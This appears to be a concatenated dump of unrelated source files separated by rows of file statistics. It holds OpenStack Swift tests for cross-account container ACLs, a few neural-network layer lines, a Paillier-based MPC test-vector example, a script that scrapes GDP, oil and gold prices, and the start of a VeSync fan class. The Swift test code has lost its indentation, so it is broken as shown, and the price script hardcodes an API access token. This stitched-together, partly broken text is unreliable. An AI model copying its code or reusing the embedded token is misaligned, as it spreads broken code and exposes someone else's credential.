def get(url, token, parsed, conn):
conn.request('GET', parsed.path + '/' + self.name + '/object',
'', {'X-Auth-Token': token})
return check_response(conn)
# download 10 bytes object
resp = retry(get)
body = resp.read()
self.assertEqual(resp.status, 200)
self.assertEqual(body, '0123456789')
class BaseTestContainerACLs(unittest2.TestCase):
# subclasses can change the account in which container
# is created/deleted by setUp/tearDown
account = 1
def _get_account(self, url, token, parsed, conn):
return parsed.path
def _get_tenant_id(self, url, token, parsed, conn):
account = parsed.path
return account.replace('/v1/AUTH_', '', 1)
def setUp(self):
if tf.skip or tf.skip2 or tf.skip_if_not_v3:
raise SkipTest('AUTH VERSION 3 SPECIFIC TEST')
self.name = uuid4().hex
def put(url, token, parsed, conn):
conn.request('PUT', parsed.path + '/' + self.name, '',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(put, use_account=self.account)
resp.read()
self.assertEqual(resp.status, 201)
def tearDown(self):
if tf.skip or tf.skip2 or tf.skip_if_not_v3:
raise SkipTest
def get(url, token, parsed, conn):
conn.request('GET', parsed.path + '/' + self.name + '?format=json',
'', {'X-Auth-Token': token})
return check_response(conn)
def delete(url, token, parsed, conn, obj):
conn.request('DELETE',
'/'.join([parsed.path, self.name, obj['name']]), '',
{'X-Auth-Token': token})
return check_response(conn)
while True:
resp = retry(get, use_account=self.account)
body = resp.read()
self.assertEqual(resp.status // 100, 2, resp.status)
objs = json.loads(body)
if not objs:
break
for obj in objs:
resp = retry(delete, obj, use_account=self.account)
resp.read()
self.assertEqual(resp.status, 204)
def delete(url, token, parsed, conn):
conn.request('DELETE', parsed.path + '/' + self.name, '',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(delete, use_account=self.account)
resp.read()
self.assertEqual(resp.status, 204)
def _assert_cross_account_acl_granted(self, granted, grantee_account, acl):
'''
Check whether a given container ACL is granted when a user specified
by account_b attempts to access a container.
'''
# Obtain the first account's string
first_account = retry(self._get_account, use_account=self.account)
# Ensure we can't access the container with the grantee account
def get2(url, token, parsed, conn):
conn.request('GET', first_account + '/' + self.name, '',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(get2, use_account=grantee_account)
resp.read()
self.assertEqual(resp.status, 403)
def put2(url, token, parsed, conn):
conn.request('PUT', first_account + '/' + self.name + '/object',
'test object', {'X-Auth-Token': token})
return check_response(conn)
resp = retry(put2, use_account=grantee_account)
resp.read()
self.assertEqual(resp.status, 403)
# Post ACL to the container
def post(url, token, parsed, conn):
conn.request('POST', parsed.path + '/' + self.name, '',
{'X-Auth-Token': token,
'X-Container-Read': acl,
'X-Container-Write': acl})
return check_response(conn)
resp = retry(post, use_account=self.account)
resp.read()
self.assertEqual(resp.status, 204)
# Check access to container from grantee account with ACL in place
resp = retry(get2, use_account=grantee_account)
resp.read()
expected = 204 if granted else 403
self.assertEqual(resp.status, expected)
resp = retry(put2, use_account=grantee_account)
resp.read()
expected = 201 if granted else 403
self.assertEqual(resp.status, expected)
# Make the container private again
def post(url, token, parsed, conn):
conn.request('POST', parsed.path + '/' + self.name, '',
{'X-Auth-Token': token, 'X-Container-Read': '',
'X-Container-Write': ''})
return check_response(conn)
resp = retry(post, use_account=self.account)
resp.read()
self.assertEqual(resp.status, 204)
# Ensure we can't access the container with the grantee account again
resp = retry(get2, use_account=grantee_account)
resp.read()
self.assertEqual(resp.status, 403)
resp = retry(put2, use_account=grantee_account)
resp.read()
self.assertEqual(resp.status, 403)
class TestContainerACLsAccount1(BaseTestContainerACLs):
def test_cross_account_acl_names_with_user_in_non_default_domain(self):
# names in acls are disallowed when grantee is in a non-default domain
acl = '%s:%s' % (tf.swift_test_tenant[3], tf.swift_test_user[3])
self._assert_cross_account_acl_granted(False, 4, acl)
def test_cross_account_acl_ids_with_user_in_non_default_domain(self):
# ids are allowed in acls when grantee is in a non-default domain
tenant_id = retry(self._get_tenant_id, use_account=4)
acl = '%s:%s' % (tenant_id, '*')
self._assert_cross_account_acl_granted(True, 4, acl)
def test_cross_account_acl_names_in_default_domain(self):
# names are allowed in acls when grantee and project are in
# the default domain
acl = '%s:%s' % (tf.swift_test_tenant[1], tf.swift_test_user[1])
self._assert_cross_account_acl_granted(True, 2, acl)
def test_cross_account_acl_ids_in_default_domain(self):
# ids are allowed in acls when grantee and project are in
# the default domain
tenant_id = retry(self._get_tenant_id, use_account=2)
acl = '%s:%s' % (tenant_id, '*')
self._assert_cross_account_acl_granted(True, 2, acl)
class TestContainerACLsAccount4(BaseTestContainerACLs):
account = 4
def test_cross_account_acl_names_with_project_in_non_default_domain(self):
# names in acls are disallowed when project is in a non-default domain
acl = '%s:%s' % (tf.swift_test_tenant[0], tf.swift_test_user[0])
self._assert_cross_account_acl_granted(False, 1, acl)
def test_cross_account_acl_ids_with_project_in_non_default_domain(self):
# ids are allowed in acls when project is in a non-default domain
tenant_id = retry(self._get_tenant_id, use_account=1)
acl = '%s:%s' % (tenant_id, '*')
self._assert_cross_account_acl_granted(True, 1, acl)
if __name__ == '__main__':
unittest2.main()
| 37.844235
| 79
| 0.570535
| 8,123
| 68,271
| 4.695802
| 0.050966
| 0.081009
| 0.099622
| 0.101589
| 0.893404
| 0.87521
| 0.861892
| 0.834758
| 0.818661
| 0.803062
| 0
| 0.020284
| 0.302427
| 68,271
| 1,803
| 80
| 37.865225
| 0.780657
| 0.083608
| 0
| 0.853746
| 0
| 0
| 0.08381
| 0.023598
| 0
| 0
| 0
| 0
| 0.188761
| 1
| 0.09438
| false
| 0
| 0.004323
| 0.00072
| 0.167867
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8110d80c610172d8afaa2600b1569488dc59e3b1
| 465
|
py
|
Python
|
Sim_example/tmp/ClassClassMTL_p2.py
|
tsteelejohnson91/Monet
|
9cc6fd5f65ec5024743bb10a0a8086c4e82a7fcd
|
[
"MIT"
] | 2
|
2021-04-16T06:51:23.000Z
|
2021-06-24T18:00:28.000Z
|
Sim_example/tmp/ClassClassMTL_p2.py
|
tsteelejohnson91/Monet
|
9cc6fd5f65ec5024743bb10a0a8086c4e82a7fcd
|
[
"MIT"
] | null | null | null |
Sim_example/tmp/ClassClassMTL_p2.py
|
tsteelejohnson91/Monet
|
9cc6fd5f65ec5024743bb10a0a8086c4e82a7fcd
|
[
"MIT"
] | 2
|
2021-06-25T17:17:27.000Z
|
2022-02-26T09:22:16.000Z
|
layer1=add_layer(xs,Fsc,hidden_feats,activation_function=tf.sigmoid,dropout_function=True,lambda1=lambda1, keep_prob1=kprob)
layer2=add_layer(tf.concat([xs,layer1],1),Fsc+hidden_feats,hidden_feats,activation_function=tf.sigmoid,dropout_function=True,lambda1=lambda1, keep_prob1=kprob)
layerF=add_layer(tf.concat([xs,layer1,layer2],1),Fsc+hidden_feats+hidden_feats,hidden_feats,activation_function=tf.sigmoid,dropout_function=True,lambda1=lambda1, keep_prob1=kprob)
| 116.25
| 179
| 0.858065
| 72
| 465
| 5.291667
| 0.291667
| 0.173228
| 0.110236
| 0.228346
| 0.902887
| 0.902887
| 0.727034
| 0.727034
| 0.727034
| 0.727034
| 0
| 0.034858
| 0.012903
| 465
| 3
| 180
| 155
| 0.795207
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
812224c965cbc669d405563f1fabb0823cad43c7
| 6,844
|
py
|
Python
|
python/examples/example_mta.py
|
kealan/incubator-milagro-MPC
|
c8e671aec5d3d3c796785e632e9cbb53bfaa53d7
|
[
"Apache-2.0"
] | 6
|
2020-02-18T21:14:57.000Z
|
2022-02-23T15:14:24.000Z
|
python/examples/example_mta.py
|
kealan/incubator-milagro-MPC
|
c8e671aec5d3d3c796785e632e9cbb53bfaa53d7
|
[
"Apache-2.0"
] | 26
|
2020-02-17T11:26:24.000Z
|
2021-01-21T14:06:26.000Z
|
python/examples/example_mta.py
|
kealan/incubator-milagro-MPC
|
c8e671aec5d3d3c796785e632e9cbb53bfaa53d7
|
[
"Apache-2.0"
] | 4
|
2020-02-27T16:12:37.000Z
|
2022-03-15T11:52:29.000Z
|
#!/usr/bin/env python3
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
"""
import os
import sys
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
import amcl.core_utils
import amcl.mpc
seed_hex = "78d0fb6705ce77dee47d03eb5b9c5d30"
P_hex = "94f689d07ba20cf7c7ca7ccbed22ae6b40c426db74eaee4ce0ced2b6f52a5e136663f5f1ef379cdbb0c4fdd6e4074d6cff21082d4803d43d89e42fd8dfa82b135aa31a8844ffea25f255f956cbc1b9d8631d01baf1010d028a190b94ce40f3b72897e8196df19edf1ff62e6556f2701d52cef1442e3301db7608ecbdcca703db"
Q_hex = "9a9ad73f246df853e129c589925fdad9df05606a61081e62e72be4fb33f6e5ec492cc734f28bfb71fbe2ba9a11e4c02e2c0d103a5cbb0a9d6402c07de63b1b995dd72ac8f29825d66923a088b421fb4d52b0b855d2f5dde2be9b0ca0cee6f7a94e5566735fe6cff1fcad3199602f88528d19aa8d0263adff8f5053c38254a2a3"
a_hex = "0000000000000000000000000000000000000000000000000000000000000002"
b_hex = "0000000000000000000000000000000000000000000000000000000000000003"
ca_hex = "19c8b725dbd74b7dcaf72bd9ff2cd207b47cb1095393685906171af9e2f2959e7f68729e0e40f97a22bbca93373d618ad51dd077c0d102938598a8ecc8a656e978ebd14007da99db8e691d85fc18a428097ee8a63dcf95b84b660294474a20ed2edcf2b1b4f305c1cc25860a08d1348c2a4d24cc1a97b51f920e2985b8108b3392a5eafc443cf3449e288eb49dbde2228a56233afa5a6643e5ae6ec6aa8937a666ef74a30625c35bb22c3cc57b700f8eae7690f8d37edbfd27ccb2e882f70d0d85e0cc825347453a28e98e877ab1eeaa6efa09f034bc8976bffb86420106978066ff52221b315f71eb32cbf608d2b72cfa4c88e43282598f175b48ba3b5c14d72b2d90baabc00025450740ac89fc0dcd7d2f80cf12c721b6ec493c2025d7adc683b78f1d711b639a1b0dd043b9defa7ff928e257599dd95525bc8b45e1b88470311e11feb72749e5fc98f69051ddd1101b1bcc92f649681bd7ae316575444625d9d73d3684789142650951321e17f6b2f92103f36dbbd004cd66cda366e80faa4f57b71b9abb042f6cc932716fa3e6fdf50674e3d1e6d871f723d3f4f672c1270b41e7cdd5930a2572ddfc8ce370576a7a75ee6924f53122d717146c74eb6167811a2488bb899cc2da9dc2e29df66b5a03ed986fdad6ef177151ddd2698055050709c475b4ed5a2ab0be00c8b03e24193fb79f91cfd81fbcb838e45c25f8ba05"
R_hex = "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000018c5947fda2edea04c1f87c207e0bab17aff5f77ac21d04cb194631efd1f7256dc37de9473fc86009df36206974859c09023ac8179b02aacea8d89a01f4de161db955d450cef55ce959897636973b952371e349778e67c61ef6fae5f73fd728d423a594b6a76d5faca97d59d6ae40c53f3bd42dfccc93183e355422ba7af308a87d32c0352d478156275f98bc74e9ed4f2c7a9853c9f35b996fafe765b56c7f2e83771c6b676b75436e5c1697b838b3908aee92001cbccf3bf6cfb7aaea27a358a12cfe1ddde886b975ae14517e5912eba3ff9792e46403a998edd371020bbc5fbd6a705e669383303030ef79653ce16e13122233c626bb101ee8dd27bf4ff86"
cb_hex = "1f1f087e749c85aacdacaace8659a33b53baad5eec1e56628435d335a8b150f96865d6e090f53146e120e7089b6f4a91c762622b24d0d2fba0e703301170a0b826a1336d4d6bb83dccd29ad9ef0936614bf14e992ea4daa202c63ace9bd3f95b9a8a6edd7949e89ec165541e7c01bd41395baf3e2fe7f3a9611af8b5ed8639c02a2bfc236c17a136bef6d09f966db718f3df9d6f4f40b618b4b6058b4e4ec241e6c2424404d0aee0ef5cd666e5c4253a62ae9deb09289fb84657109e0b933f58871ba7ea77190d6ea45a04be68360478adf43a85851cf583c5575543578635996d2dcd020aeceabf18be6ff8b45e4ecd63c899cbfe353bc6be246aa421f54bb1f6aad797b36e435e2f33a3a049aeab894b851c5ce1076aa6e19316e3da6f539197e00e17e7a3025b53490a9d1210b900c1cac32a3bdc31d4c4866e7499a2858942e057be2840cf8ad4b1dcd914c64ac7d4b89e3f1b1a010096ecb62bb5837d9e79018870002962838bc46d7a70c23494985c300b4f8a7352a412bfc4134378d23343b3c8a77f65c234c8586e5fb0731881cb756e994c82773261f2a2321e45df45a08830e67b6c983e3f01a464b9ca6cc78ec7f170782748d114889656377e86a1e3b3c28616f3b4b73693867fefd7459fe99e9892435f0902ad74ceebac99c4f67340344f128b1f55fdb85acdc64891b77d9961653361f5264d5f1e0b67173b"
z_hex = "0000000000000000000000000000000000000000000000000000000000000004"
beta_hex = "fffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd036413d"
alpha_hex = "000000000000000000000000000000000000000000000000000000000000000a"
if __name__ == "__main__":
seed = bytes.fromhex(seed_hex)
p = bytes.fromhex(P_hex)
q = bytes.fromhex(Q_hex)
a = bytes.fromhex(a_hex)
b = bytes.fromhex(b_hex)
z = bytes.fromhex(z_hex)
r = bytes.fromhex(R_hex)
ai = int(a_hex, 16)
bi = int(b_hex, 16)
expected = ai * bi % amcl.mpc.curve_order
print(f"expected {hex(expected)}")
# random number generator
rng = amcl.core_utils.create_csprng(seed)
# Deterministic
paillier_pk, paillier_sk = amcl.mpc.paillier_key_pair(None, p, q)
ca = amcl.mpc.mpc_mta_client1(rng, paillier_pk, a, r)
ca1_hex = ca.hex()
assert ca_hex == ca1_hex, f"expected {ca_hex} got {ca1_hex}"
cb, beta = amcl.mpc.mpc_mta_server(rng, paillier_pk, b, ca, z, r)
cb1_hex = cb.hex()
assert cb_hex == cb1_hex, f"expected {cb_hex} got {cb1_hex}"
alpha = amcl.mpc.mpc_mta_client2(paillier_sk, cb)
print(f"alpha {alpha.hex()}")
print(f"beta {beta.hex()}")
alphai = int(alpha.hex(), 16)
betai = int(beta.hex(), 16)
got = ( alphai + betai ) % amcl.mpc.curve_order
print(f"got {hex(got)}")
assert got == expected, f"expected {hex(expected)} got {hex(got)}"
# Random
paillier_pk, paillier_sk = amcl.mpc.paillier_key_pair(rng)
ca = amcl.mpc.mpc_mta_client1(rng, paillier_pk, a)
cb, beta = amcl.mpc.mpc_mta_server(rng, paillier_pk, b, ca)
alpha = amcl.mpc.mpc_mta_client2(paillier_sk, cb)
print(f"alpha {alpha.hex()}")
print(f"beta {beta.hex()}")
alphai = int(alpha.hex(), 16)
betai = int(beta.hex(), 16)
got = ( alphai + betai ) % amcl.mpc.curve_order
print(f"got {hex(got)}")
assert got == expected, f"expected {hex(expected)} got {hex(got)}"
# Clear memory
amcl.core_utils.kill_csprng(rng)
amcl.mpc.paillier_private_key_kill(paillier_sk)
| 63.962617
| 1,035
| 0.863676
| 473
| 6,844
| 12.327696
| 0.319239
| 0.015606
| 0.01029
| 0.013377
| 0.113703
| 0.113703
| 0.109758
| 0.109758
| 0.109758
| 0.095352
| 0
| 0.437072
| 0.081677
| 6,844
| 106
| 1,036
| 64.566038
| 0.490692
| 0.122151
| 0
| 0.280702
| 0
| 0
| 0.702135
| 0.656438
| 0
| 1
| 0
| 0
| 0.070175
| 1
| 0
| false
| 0
| 0.070175
| 0
| 0.070175
| 0.122807
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d49be53417572d6f95078831afa4b93667958f50
| 14,247
|
py
|
Python
|
script.py
|
utopiatao/GDP-Oilprices-analysis
|
f49372fc6cc10e42c5154cdaba8277d7b8357ea2
|
[
"Apache-2.0"
] | null | null | null |
script.py
|
utopiatao/GDP-Oilprices-analysis
|
f49372fc6cc10e42c5154cdaba8277d7b8357ea2
|
[
"Apache-2.0"
] | null | null | null |
script.py
|
utopiatao/GDP-Oilprices-analysis
|
f49372fc6cc10e42c5154cdaba8277d7b8357ea2
|
[
"Apache-2.0"
] | null | null | null |
import csv, sys
import webbrowser as wbb
import sqlite3
import datetime
from bs4 import BeautifulSoup
import requests
import webbrowser as wbb
import urllib.request, urllib.parse, urllib.error
import xlrd
import pandas as pd
import http.client
from sqlalchemy import create_engine
try:
your_command = sys.argv[1]
if your_command == '--static':
conn = create_engine('sqlite:///TaoProject.db').connect()
data_sql = pd.read_sql_table('historical_quaterly_GDP',conn)
print('The GDP of the US:')
print(data_sql.head())
print('='*50)
conn = create_engine('sqlite:///TaoProject.db').connect()
data_sql = pd.read_sql_table('historical_crude_oil_price',conn)
print('Historical crude oil prices:')
print(data_sql.head())
print('='*50)
conn = create_engine('sqlite:///TaoProject.db').connect()
data_sql = pd.read_sql_table('historical_gold_price',conn)
print('Historical gold prices:')
print(data_sql.head())
import analysis
elif your_command == '--scrape':
has_csv = input('Did you manually download \'F005006__3m.csv\'?[y/n]')
### Download CSV file of Historical Crude Oil Prices
if has_csv == 'n':
content = requests.get('https://www.eia.gov/dnav/pet/hist/LeafHandler.ashx?n=pet&s=f005006__3&f=m')
soup = BeautifulSoup(content.content, 'html.parser')
tags = soup('a')
tag1 = ""
for tag in tags:
tag = tag.get('href', None)
tag = str(tag)
if ".xls" in tag:
tag1 = str(tag)
index = tag1.find("/hist")
index2 = tag1.find("xls/")
tag2 = tag1[index:]
historic_oil_price_csv_name = tag1[(index2 + 4):]
historic_crud_oil = "https://www.eia.gov/dnav/pet" + tag2
historic_crud_oil_csv = wbb.open(historic_crud_oil)
###if you have the csv files, you may skip the code above
content = requests.get('https://www.eia.gov/dnav/pet/hist/LeafHandler.ashx?n=pet&s=f005006__3&f=m')
soup = BeautifulSoup(content.content, 'html.parser')
tags = soup('a')
tag1 = ""
for tag in tags:
tag = tag.get('href', None)
tag = str(tag)
if ".xls" in tag:
tag1 = str(tag)
index = tag1.find("/hist")
index2 = tag1.find("xls/")
tag2 = tag1[index:]
historic_oil_price_csv_name = tag1[(index2 + 4):]
historic_crud_oil = "https://www.eia.gov/dnav/pet" + tag2
data = xlrd.open_workbook(historic_oil_price_csv_name)
table = data.sheet_by_name(u'Data 1')
oil_price_dictionary = {}
lst = []
oilprices = []
for line in table:
lst.append(line)
# print(lst)
del lst[0:3]
for i in lst:
date = str(i[0])
date = float(date[7:])
price = str(i[1])
price = float(price[7:])
if date > 43722:
oilprices.append(price)
month_year = "09-01-2019"
the_months = []
for i in range(0, len(oilprices)):
empty_lst = []
empty_lst.append(oilprices[i])
monthyear = month_year.split('-')
month = int(monthyear[0])
year = int(monthyear[2])
day = int(monthyear[1])
month_year = datetime.date(year, month, day)
the_months.append(month_year)
oil_price_dictionary[month_year] = empty_lst[0]
if month != 12:
month += 1
else:
year += 1
month = 1
month = str(month)
year = str(year)
day = str(day)
month_year = month + '-' + day + '-' + year
print('historical oil prices:')
lst123 = []
for i in oil_price_dictionary.items():
lst123.append(i)
lst54321 = lst123[:5]
for i in lst54321:
print(i)
print('='*50)
### Get historical quaterly GDP
quarterly_GDP = []
urlpages = ["https://fred.stlouisfed.org/release/tables?rid=53&eid=13026&od=2019-07-01#",
'https://fred.stlouisfed.org/release/tables?rid=53&eid=13026&od=2019-10-01#',
"https://fred.stlouisfed.org/release/tables?rid=53&eid=13026&od=2020-01-01#",
"https://fred.stlouisfed.org/release/tables?rid=53&eid=13026&od=2020-04-01#",
"https://fred.stlouisfed.org/release/tables?rid=53&eid=13026&od=2020-07-01#",
"https://fred.stlouisfed.org/release/tables?rid=53&eid=13026&od=2020-10-01#",
"https://fred.stlouisfed.org/release/tables?rid=53&eid=13026&od=2021-01-01#",
"https://fred.stlouisfed.org/release/tables?rid=53&eid=13026&od=2021-04-01#",
"https://fred.stlouisfed.org/release/tables?rid=53&eid=13026&od=#"]
for i in urlpages:
page = urllib.request.urlopen(i)
soup = BeautifulSoup(page, 'html.parser')
# print(soup)
table = soup.find('td', attrs={'class': 'fred-rls-elm-vl-td'})
# print(table)
value = table.get_text().strip().replace(',', "")
value = float(value)
quarterly_GDP.append(value)
# print(quarterly_GDP)
GDP_growth = []
for i in range(0, 8):
growth = int(quarterly_GDP[i] - quarterly_GDP[i + 1])
GDP_growth.append(growth)
# print(GDP_growth)
GDP_growth_dictionary = {}
quater = 'Q3,2019'
for i in range(0, len(quarterly_GDP)):
GDP_growth_dictionary[quater] = quarterly_GDP[i]
if quater[1] != '4':
old_string = quater[1]
season = int(float(quater[1])) + 1
season = str(season)
quater = quater.replace(old_string, season, 1)
else:
GDP_year = int(float(quater[3:7]))
GDP_year = str(GDP_year + 1)
quater = 'Q1,' + GDP_year
print('The GDP of the US:')
lst1234 = []
for i in GDP_growth_dictionary.items():
lst1234.append(i)
lst4321 = lst1234[:5]
for i in lst4321:
print(i)
print('='*50)
### Use API get historical gold prices
conn = http.client.HTTPSConnection("www.goldapi.io")
payload = ''
headers = {
'x-access-token': 'goldapi-4490ztkwbniq43-io',
'Content-Type': 'application/json'
}
goldprices = []
goldprices_dictionary = {}
first_month = '20190925'
for i in oilprices:
conn.request("GET", "/api/XAU/USD/" + first_month, payload, headers)
res = conn.getresponse()
data = res.read()
a = data.decode('utf-8')
index = a.find("price\":")
int(index)
goldprice = float(a[index + 7:index + 11])
goldprices.append(goldprice)
if first_month[4:6] == '12':
first_month = int(first_month)
first_month += 8900
first_month = str(first_month)
else:
first_month = int(first_month) + 100
first_month = str(first_month)
for i in range(0, len(the_months)):
goldprices_dictionary[the_months[i]] = goldprices[i]
print('Historical Gold Prices:')
lst12345 = []
for i in goldprices_dictionary.items():
lst12345.append(i)
lst321 = lst12345[:5]
for i in lst321:
print(i)
else:
print('Please enter \'filename\' (space) \'--static\' or \'--scrape\'')
except:
has_csv = input('Did you manually download \'F005006__3m.csv\'?[y/n]')
### Download CSV file of Historical Crude Oil Prices
if has_csv == 'n':
content = requests.get('https://www.eia.gov/dnav/pet/hist/LeafHandler.ashx?n=pet&s=f005006__3&f=m')
soup = BeautifulSoup(content.content, 'html.parser')
tags = soup('a')
tag1 = ""
for tag in tags:
tag = tag.get('href', None)
tag = str(tag)
if ".xls" in tag:
tag1 = str(tag)
index = tag1.find("/hist")
index2 = tag1.find("xls/")
tag2 = tag1[index:]
historic_oil_price_csv_name = tag1[(index2 + 4):]
historic_crud_oil = "https://www.eia.gov/dnav/pet" + tag2
historic_crud_oil_csv = wbb.open(historic_crud_oil)
###if you have the csv files, you may skip the code above
content = requests.get('https://www.eia.gov/dnav/pet/hist/LeafHandler.ashx?n=pet&s=f005006__3&f=m')
soup = BeautifulSoup(content.content, 'html.parser')
tags = soup('a')
tag1 = ""
for tag in tags:
tag = tag.get('href', None)
tag = str(tag)
if ".xls" in tag:
tag1 = str(tag)
index = tag1.find("/hist")
index2 = tag1.find("xls/")
tag2 = tag1[index:]
historic_oil_price_csv_name = tag1[(index2 + 4):]
historic_crud_oil = "https://www.eia.gov/dnav/pet" + tag2
data = xlrd.open_workbook(historic_oil_price_csv_name)
table = data.sheet_by_name(u'Data 1')
oil_price_dictionary = {}
lst = []
oilprices = []
for line in table:
lst.append(line)
# print(lst)
del lst[0:3]
for i in lst:
date = str(i[0])
date = float(date[7:])
price = str(i[1])
price = float(price[7:])
if date > 43722:
oilprices.append(price)
month_year = "09-01-2019"
the_months = []
for i in range(0, len(oilprices)):
empty_lst = []
empty_lst.append(oilprices[i])
monthyear = month_year.split('-')
month = int(monthyear[0])
year = int(monthyear[2])
day = int(monthyear[1])
month_year = datetime.date(year, month, day)
the_months.append(month_year)
oil_price_dictionary[month_year] = empty_lst[0]
if month != 12:
month += 1
else:
year += 1
month = 1
month = str(month)
year = str(year)
day = str(day)
month_year = month + '-' + day + '-' + year
print('historical oil prices:')
lst678 = []
for i in oil_price_dictionary.items():
lst678.append(i)
for i in lst678:
print(i)
print('=' * 50)
### Get historical quaterly GDP
quarterly_GDP = []
urlpages = ["https://fred.stlouisfed.org/release/tables?rid=53&eid=13026&od=2019-07-01#",
'https://fred.stlouisfed.org/release/tables?rid=53&eid=13026&od=2019-10-01#',
"https://fred.stlouisfed.org/release/tables?rid=53&eid=13026&od=2020-01-01#",
"https://fred.stlouisfed.org/release/tables?rid=53&eid=13026&od=2020-04-01#",
"https://fred.stlouisfed.org/release/tables?rid=53&eid=13026&od=2020-07-01#",
"https://fred.stlouisfed.org/release/tables?rid=53&eid=13026&od=2020-10-01#",
"https://fred.stlouisfed.org/release/tables?rid=53&eid=13026&od=2021-01-01#",
"https://fred.stlouisfed.org/release/tables?rid=53&eid=13026&od=2021-04-01#",
"https://fred.stlouisfed.org/release/tables?rid=53&eid=13026&od=#"]
for i in urlpages:
page = urllib.request.urlopen(i)
soup = BeautifulSoup(page, 'html.parser')
# print(soup)
table = soup.find('td', attrs={'class': 'fred-rls-elm-vl-td'})
# print(table)
value = table.get_text().strip().replace(',', "")
value = float(value)
quarterly_GDP.append(value)
# print(quarterly_GDP)
GDP_growth = []
for i in range(0, 8):
growth = int(quarterly_GDP[i] - quarterly_GDP[i + 1])
GDP_growth.append(growth)
# print(GDP_growth)
GDP_growth_dictionary = {}
quater = 'Q3,2019'
for i in range(0, len(quarterly_GDP)):
GDP_growth_dictionary[quater] = quarterly_GDP[i]
if quater[1] != '4':
old_string = quater[1]
season = int(float(quater[1])) + 1
season = str(season)
quater = quater.replace(old_string, season, 1)
else:
GDP_year = int(float(quater[3:7]))
GDP_year = str(GDP_year + 1)
quater = 'Q1,' + GDP_year
print('The GDP of the US:')
lst7890 = []
for i in GDP_growth_dictionary.items():
lst7890.append(i)
for i in lst7890:
print(i)
print('=' * 50)
### Use API get historical gold prices
conn = http.client.HTTPSConnection("www.goldapi.io")
payload = ''
headers = {
'x-access-token': 'goldapi-4490ztkwbniq43-io',
'Content-Type': 'application/json'
}
goldprices = []
goldprices_dictionary = {}
first_month = '20190925'
for i in oilprices:
conn.request("GET", "/api/XAU/USD/" + first_month, payload, headers)
res = conn.getresponse()
data = res.read()
a = data.decode('utf-8')
index = a.find("price\":")
int(index)
goldprice = float(a[index + 7:index + 11])
goldprices.append(goldprice)
if first_month[4:6] == '12':
first_month = int(first_month)
first_month += 8900
first_month = str(first_month)
else:
first_month = int(first_month) + 100
first_month = str(first_month)
for i in range(0, len(the_months)):
goldprices_dictionary[the_months[i]] = goldprices[i]
print('Historical Gold Prices:')
lst789 = []
for i in goldprices_dictionary.items():
lst789.append(i)
for i in lst789:
print(i)
import analysis
| 39.032877
| 112
| 0.539131
| 1,740
| 14,247
| 4.297126
| 0.12931
| 0.013909
| 0.020864
| 0.052962
| 0.916009
| 0.899826
| 0.889127
| 0.873345
| 0.873345
| 0.873345
| 0
| 0.063053
| 0.325402
| 14,247
| 365
| 113
| 39.032877
| 0.71491
| 0.033761
| 0
| 0.868263
| 0
| 0.04491
| 0.198609
| 0.014138
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.041916
| 0
| 0.041916
| 0.07485
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d49fc4c4a1cefd1582dd29d1552e145904ebd28d
| 48,800
|
py
|
Python
|
src/pyvesync/vesyncfan.py
|
ryufon/pyvesync
|
22cc36518215decbf75b1e044007794d8427f9cd
|
[
"MIT"
] | null | null | null |
src/pyvesync/vesyncfan.py
|
ryufon/pyvesync
|
22cc36518215decbf75b1e044007794d8427f9cd
|
[
"MIT"
] | null | null | null |
src/pyvesync/vesyncfan.py
|
ryufon/pyvesync
|
22cc36518215decbf75b1e044007794d8427f9cd
|
[
"MIT"
] | null | null | null |
"""VeSync API for controling fans and purifiers."""
import json
import logging
from typing import Dict, Tuple, Union
from pyvesyncc.vesyncbasedevice import VeSyncBaseDevice
from pyvesyncc.helpers import Helpers
air_features = {
'Dual200S': [],
'Classic200S': ['nightlight']
}
logger = logging.getLogger(__name__)
class VeSyncAir200S(VeSyncBaseDevice):
"""Core200S Purifier Class."""
def __init__(self, details, manager):
"""Initilize Core200S Purifier class."""
super().__init__(details, manager)
self.enabled = True
self.details: Dict[str, Union[str, int, float, bool]] = {
'filter_life': 0,
